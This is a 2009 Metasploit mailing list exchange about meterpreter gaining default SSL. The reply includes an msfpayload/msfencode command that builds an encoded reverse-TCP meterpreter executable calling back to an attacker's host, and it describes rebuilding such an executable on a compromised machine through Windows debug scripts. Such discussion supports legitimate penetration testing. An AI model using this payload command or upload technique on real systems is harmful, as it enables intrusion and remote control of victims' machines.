Metasploit mailing list archives

Meterpreter + SSL

From: wfdawson at bellsouth.net (Willard Dawson)
Date: Mon, 6 Jul 2009 23:09:35 -0400

That's cool.  I wonder, though... 

Today, for the first time in a week or more, I used msfencode and
shikata_ga_nai to make another instance of an .exe:

./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R |
./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

The resulting binary file was quite a bit larger than previously.  In the
past, I have used makescr.pl from sqlninja to create an scr file that can be
used with Windows debug to reconstitute the rv_443.exe or whatever file.
There are times when I have managed to obtain a remote shell, but for
whatever reason found it difficult if not impossible to upload to or
download onto the remote system.  When one only has a remote command shell
(of sorts), it's quite feasible to echo each line of a small .scr file to
concatenate into a remote .scr file and then use debug to rebuild the
original .exe.

That is, it's feasible when the .scr file is only 112 lines, as was the case
until recently.  Now, my work results in a 600+ line file.  I certainly
won't be manipulating that sort of file manually!  I suppose now I'll have
to get happy with scripting in my own little world...

Or, is there a way to tell msfencode to not use SSL or whatever it is that's
made it blow up the resulting .exe? 

-----Original Message-----
From: framework-bounces at spool.metasploit.com
[mailto:framework-bounces at spool.metasploit.com] On Behalf Of HD Moore
Sent: Friday, June 26, 2009 7:24 PM
To: framework at spool.metasploit.com
Subject: [framework] Meterpreter + SSL

The meterpreter payload in the SVN trunk (3.3-dev) now uses SSL by  
default. Any staging activities (including the upload of metsrv.dll) will  
still be in cleartext, but all meterpreter communications are now  
protected by SSL automatically. This SSL mode does NO verification, so its  
still possible for someone to MITM the session, but this buys some  
privacy-by-default.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

________________________________________________________________________
Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)

Current thread:

Meterpreter + SSL Willard Dawson (Jul 06)
- Meterpreter + SSL HD Moore (Jul 06)
- <Possible follow-ups>
- Meterpreter + SSL Dusk (Aug 22)